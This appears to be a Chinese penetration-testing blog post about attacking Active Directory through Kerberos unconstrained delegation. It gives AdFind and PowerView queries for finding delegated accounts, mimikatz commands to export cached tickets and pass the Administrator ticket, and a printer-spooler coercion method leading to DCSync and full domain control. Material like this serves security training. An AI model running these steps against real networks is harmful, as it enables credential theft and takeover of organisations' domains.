点我

委派设置

非约束性委派设置在域控上面,设置对象分为两种

机器账户

点击应用-确定即可

注册了SPN的用户

配置了非约束性委派的机器,一旦访问该机器,TGT就会被缓存在LSASS进程的内存中,通过klist是不能查看的,必须查看内存。

需注意以下问题:

  • 域控是默认配置了非约束性委派的
  • 配置的非约束性委派最好是机器用户

查询已配置账户

配置与没有配置用户属性对比

AdFind.exe进行查询

如果是在工作组中机器进行查询,需要提供域用户及密码

查询机器用户配置了非约束性委派

AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

查询域用户(配置了SPN的用户)配置了非约束性委派

AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

Powerview.ps1
Import-Module .\Powerview.ps1
Get-NetComputer -unconstrained | select dnshostname, samaccountname

钓鱼方式进行委派攻击

1、诱导管理员通过Kerberos访问被控机器(诱导管理员访问借助了Windows特性会用当前账户密码进行认证的特性)

2、在被控机器上使用mimikatz进行导出

privilege::debug
sekurlsa::tickets /export

3、将administrator票据注入到内存中,就可以访问域控了

kerberos::ptt [0;524c5]-2-0-60a10000-Administrator@krbtgt-XBXAQ.COM.kirbi

打印机漏洞进行委派攻击

一般情况下,域控是不会自动访问域内机器。可以利用Windows 打印系统远程协议(MS-RPRN),该方法域用户可以使用S-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex)的方法强制任何允许了Spooler服务的计算机,以通过Kerberos或NTLM对攻击者选择的目录进行身份认证。

非约束性委派主机接合Spooler打印机服务漏洞,可以让域控机器DC强制访问已控的具有本地管理员权限的非约束性委派机器,从而拿到域控用户的HASH值,从而控制整个域。

主动与被动的区别
  • 主动:拿到域用户的hash值,进行PTT攻击
  • 被动:拿到机器用户的hash值,使用dcsync,接着进行PTT攻击
分类: 内网渗透

评论

-- 评论已关闭 --

目录